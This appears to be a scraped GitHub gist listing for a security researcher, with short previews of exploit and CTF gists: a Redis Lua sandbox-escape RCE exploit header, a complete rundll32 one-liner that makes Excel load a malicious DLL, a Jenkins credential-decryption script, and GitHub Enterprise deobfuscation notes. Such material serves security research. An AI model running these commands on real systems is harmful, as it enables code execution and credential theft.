🍊
This is orange ._.

Orange Tsai orangetw

@orangetw
orangetw / redis-lua-linux-x86-poc.py
Created Feb 12, 2019 — forked from c3c/redis-lua-linux-x86-poc.py
Redis Lua 5.1 sandbox escape 32-bit Linux exploit
View redis-lua-linux-x86-poc.py
## Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Original exploit by corsix and sghctoma
## Author: @c3c
## It's possible to abuse the Lua 5.1 sandbox to obtain RCE by loading modified bytecode
## This concept is fully explained on corsix' gist at https://gist.github.com/corsix/6575486
## This version uses pieces of the 32-bit Windows exploit made by corsix and the 64-bit Linux exploit made by sghctoma; as expected, a few offsets were different
## sghctoma's exploit uses the arbitrary memory read to leak pointers to libc and find the address of "system" http://paper.seebug.org/papers/Security%20Conf/Defcon/2015/DEFCON-23-Tamas-Szakaly-Shall-We-Play-A-Game.pdf
## This code is much the same, except the process is done using pwntools' DynELF
## Furthermore, attempting to leak addresses in libc appears to cause segfaults on my 32-bit Linux, in which case, you will need to obtain the remote libc version
View introspection-query.graphql
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    subscriptionType { name }
    types {
      ...FullType
    }
    directives {
@orangetw
orangetw / all.txt
Created Sep 7, 2018 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
View all.txt
@orangetw
orangetw / Advanced-HTTP-en.md
Created Nov 19, 2017 — forked from nicolas-grekas/Advanced-HTTP-en.md
Advanced handling of HTTP requests in PHP
View Advanced-HTTP-en.md
View jenkins-decrypt.groovy
// To decrypt a Jenkins password stored in credentials.xml, e.g.:
// <username>jenkins</username>
// <passphrase>your-secret-hash-S0SKVKUuFfUfrY3UhhUC3J</passphrase>
// Go to the Jenkins script console:
// http://jenkins-host/script
// In the console, paste the script
hashed_pw='your-secret-hash-S0SKVKUuFfUfrY3UhhUC3J'
@orangetw
orangetw / excel.bat
Created Jul 22, 2017 — forked from ryhanson/ExcelXLL.md
Execute DLL via the Excel.Application object's RegisterXLL() method
View excel.bat
REM rundll32 mshtml.dll HTA one-liner command:
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();
View bounties.csv
cve product bounty source
CVE-2014-0257 .NET Framework 5,000.00 https://hackerone.com/reports/18851
CVE-2015-3842 Android 2,000.00 https://code.google.com/p/android/issues/detail?id=177610
CVE-2015-3847 Android 1,500.00 https://code.google.com/p/android/issues/detail?id=179147
CVE-2015-3860 Android 500.00 https://code.google.com/p/android/issues/detail?id=178139
CVE-2015-3862 Android 333.00 https://code.google.com/p/android/issues/detail?id=181895
CVE-2015-3865 Android 1,500.00 https://code.google.com/p/android/issues/detail?id=182294
CVE-2015-3867 Android 4,000.00 https://code.google.com/p/android/issues/detail?id=182838
CVE-2015-3868 Android 4,000.00 https://code.google.com/p/android/issues/detail?id=182146
CVE-2015-3869 Android 3,000.00 https://code.google.com/p/android/issues/detail?id=182053
View ruby_revealer.sh
#!/usr/bin/sudo sh
## ruby_revealer.sh -- decrypt obfuscated GHE .rb files. 2.0.0 to 2.3.1+.
## From `strings ruby_concealer.so`:
##
## > This obfuscation is intended to discourage GitHub Enterprise customers
## > from making modifications to the VM.
##
## Well, good, as long as it's not intended to discourage *me* from doing this!
@orangetw
orangetw / nanana.xxd
Created Oct 19, 2015
HITCON CTF 2015 Quals nanana
View nanana.xxd
@orangetw
orangetw / index.php
Created Oct 19, 2015
HITCON CTF 2015 Quals Giraffe's Coffee
View index.php
<?php
include "config.php";
mysql_connect($dbhost, $dbuser, $dbpass);
mysql_select_db($dbname);
function escape($str){
    $str = strtolower($str);
    $str = str_replace("'", "", $str);
    $str = str_replace("\\", "", $str);